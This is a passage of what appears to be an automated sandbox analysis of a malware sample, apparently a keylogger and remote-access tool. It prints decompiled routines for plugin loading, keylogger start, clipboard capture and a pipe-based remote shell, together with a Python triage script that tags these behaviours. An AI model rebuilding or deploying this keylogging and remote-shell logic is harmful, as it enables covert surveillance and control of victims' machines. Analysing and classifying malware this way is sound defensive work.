				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB); // tokenizer: splits on the string at 0x41b310 (its subcall list shows find/substr/length)
				_t53 = _t50 + 0x24;
				_t19 = _t49 - 0x42; // 0x42 = 'B', 0x43 = 'C'
				if(_t19 == 0) {
					// 'B': load the module named by the argument and resolve its "FunFunc" export
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t21 = E00406DD9(_t20); // module handle (LoadLibrary-style wrapper, inferred)
					__eflags = _t21;
					_pop(_t38);
					if(_t21 != 0) {
						_t24 = E00407033(_t21, "FunFunc"); // export address (GetProcAddress-style wrapper, inferred)
						_push(_t38);
						 *0x41ba18 = _t24; // saved FunFunc pointer
						 *0x41ba1c = 1; // "plugin loaded" flag
						E00412855(_t38, _t53, 0x41bcf8);
						E004020C2(_a4, 0x6d, _t38);
					}
				} else {
					_t56 = _t19 == 1;
					if(_t19 == 1) {
						// 'C': call the saved FunFunc with the argument converted by atoi(); the 0x41ba1c flag is not checked, as decompiled
						_t29 = E0040180C( &_v20, _t56, 0);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x41ba18(atoi(_t29));
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00407BAE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                  • atoi.MSVCRT ref: 00407BFC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                  • String ID: FunFunc
                                  • API String ID: 2980839617-81400306
                                  • Opcode ID: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                  • Opcode Fuzzy Hash: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
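The four function listings above (E00412553, E004078BB, E00407B8C, E00405180) each pair a decompiled body with an "APIs" and a "Strings" bullet list, and those bullets alone already separate the downloader from the browser-data clearer, the FunFunc plugin handler and the keylogger start. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses the bullet lists into per-function API and string sets and tags each function with the behaviour the bullets support. The sample input is a subset of the bullet lines copied from this page; the capability names and thresholds (downloader, retry_sleep_loop, browser_data_clearing, funfunc_plugin_export, keylogger_start) are this editor's own and would be extended for a full report.

```python
"""Tag decompiled functions in a Joe Sandbox listing by the APIs/strings they use.
Added example; the rule set is the editor's own, not Joe Sandbox's."""
import re

# Function header as printed by the report: "E00412553(<args>) {"
FUNC_RE = re.compile(r"^(?P<name>E[0-9A-F]{8})\(.*\)\s*\{$")
# API bullet: optional "Part of subcall function XXXXXXXX:", then Name.MODULE,
# optional "(comma-separated args)", then "ref: XXXXXXXX".
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Strings bullet: "<string>, xrefs: XXXXXXXX"
STRING_RE = re.compile(r"^\s*(?:•\s*)?(?P<s>.+), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
HEX_ARG = re.compile(r"^[0-9A-F]{8}$")  # numeric argument, not a string literal

# Constructed sample: function headers plus a subset of their bullets, copied from this page.
SAMPLE_REPORT = r"""
E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
APIs
• InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
• InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
• InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
• ??2@YAPAXI@Z.MSVCRT ref: 004125D1
• ??3@YAXPAX@Z.MSVCRT ref: 0041260C
• InternetCloseHandle.WININET(?), ref: 00412652
E004078BB(void* __ecx) {
APIs
• Sleep.KERNEL32 ref: 004078D4
• Sleep.KERNEL32(00001388), ref: 0040794C
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
  • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
Strings
• Cleared browsers logins and cookies., xrefs: 0040798D
• [INFO], xrefs: 004079A1
E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
APIs
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
• atoi.MSVCRT ref: 00407BFC
• ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
E00405180(void* __ecx, char _a4) {
APIs
  • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
"""


def parse_report(text):
    """Group API calls (direct and from subcalls) and string literals per function."""
    funcs, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = FUNC_RE.match(line)
        if m:
            current = m.group("name")
            funcs[current] = {"apis": [], "subcall_apis": [], "strings": set()}
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            bucket = "subcall_apis" if m.group("sub") else "apis"
            funcs[current][bucket].append((m.group("name"), m.group("mod")))
            # Literal arguments (anything that is not a hex constant or "?") are
            # strings the function passes around, e.g. log messages.
            for tok in (m.group("args") or "").split(","):
                tok = tok.strip()
                if tok and tok != "?" and not HEX_ARG.match(tok):
                    funcs[current]["strings"].add(tok)
            continue
        m = STRING_RE.match(line)
        if m:
            funcs[current]["strings"].add(m.group("s"))
    return funcs


def _direct(f):
    return {name for name, _mod in f["apis"]}


def _all(f):
    return [name for name, _mod in f["apis"] + f["subcall_apis"]]


# Capability rules, each grounded in a behaviour visible in the listings above.
RULES = {
    "downloader": lambda f: {"InternetOpenUrlA", "InternetReadFile"} <= _direct(f),
    "retry_sleep_loop": lambda f: _all(f).count("Sleep") >= 2,
    "browser_data_clearing": lambda f: any("cookies" in s.lower() for s in f["strings"]),
    "funfunc_plugin_export": lambda f: "FunFunc" in f["strings"] and "atoi" in _direct(f),
    "keylogger_start": lambda f: any("Keylogger" in s for s in f["strings"])
    and "GetKeyboardLayout" in _all(f),
}


def classify(funcs):
    """Return {function: sorted list of matching capability tags}."""
    return {name: sorted(tag for tag, rule in RULES.items() if rule(f)) for name, f in funcs.items()}


if __name__ == "__main__":
    for name, tags in classify(parse_report(SAMPLE_REPORT)).items():
        print(name, ", ".join(tags) or "-")
```

To run it over a saved report, pass the whole text file to parse_report(): the header regex keys on the "E<address>(...) {" line that opens each C-Code listing, so the decompiled bodies and the address columns can stay in the input, and subcall APIs are kept in a separate bucket because they describe a callee rather than the function itself.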

                                  C-Code - Quality: 26%
			E00405180(void* __ecx, char _a4) {
				// Offline keylogger start (decompiler output, comments added): marks the
				// object active, records the keyboard layout, logs "Offline Keylogger
				// Started" and creates the worker threads.
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1; // active flag in the keylogger object
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx); // wide-string assignment
				E00405156(__ecx); // calls GetKeyboardLayout (subcall list below)
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) { // 0x32 = '2'
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx); // writes the message with a "[YYYY/MM/DD hh:mm:ss ]" prefix built via GetLocalTime (subcall list below)
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B(); // "[INFO]" log entry, as in E004078BB above
				CreateThread(0, 0, E0040528A, _t19, 0, 0); // worker thread 1
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0); // worker thread 2, only when the first dword of the object is 0
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // worker thread 3
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,761B43E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32 ref: 00405204
                                  • CreateThread.KERNEL32 ref: 00405214
                                  • CreateThread.KERNEL32 ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
                                  				char _v5;
                                  				char _v24;
                                  				char _v40;
                                  				char* _t13;
                                  				void* _t18;
                                  				void* _t34;
                                  
                                  				_t18 = __ecx;
                                  				if(( *0x41b8f8 & 0x00000001) == 0) {
                                  					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  					E00413E72(E00406CF4);
                                  				}
                                  				E00406BEF(_t18,  &_v24);
                                  				_t13 =  &_v24;
                                  				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                  				if(_t13 == 0) {
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                  					_t13 =  &_v24;
                                  					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                  					if(_t13 != 0) {
                                  						L00414176();
                                  						L00414170();
                                  						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t13;
                                  			}


                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getenv.MSVCRT ref: 105445C3
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 1054469D
                                    • Part of subcall function 10543A2A: connect.WS2_32(0041B240,0041B244,00000010), ref: 10543A40
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 10544700
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10544726
                                  • malloc.MSVCRT ref: 10544738
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 10544750
                                  • _strncoll.MSVCRT ref: 10544772
                                  • ??3@YAXPAX@Z.MSVCRT ref: 105447FD
                                  • WriteFile.KERNEL32(00000000), ref: 1054487C
                                  • Sleep.KERNEL32(00000064), ref: 10544896
                                  • TerminateProcess.KERNEL32(00000000), ref: 105448B0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileProcessSleep$??3@CreateNamedPeekPipeReadTerminateWrite_strncollconnectgetenvmalloc
                                  • String ID:
                                  • API String ID: 1953786159-0
                                  • Opcode ID: c437fb62b551716d388a015297db68c5a4a1296deaa3bf92615400c475bd4ade
                                  • Instruction ID: 2404f9a4c146d33880c6c182ce8773e55026f3b9b3c73d851c6a5d0db2ceb2c9
                                  • Opcode Fuzzy Hash: c437fb62b551716d388a015297db68c5a4a1296deaa3bf92615400c475bd4ade
                                  • Instruction Fuzzy Hash: 54B1B431A40609EFDB01ABA1DC4DAEE7FB9EB85B50F10803AF811D61A0DBB45945CFD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E10555933(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				char _v100;
                                  				char _v104;
                                  				int _v108;
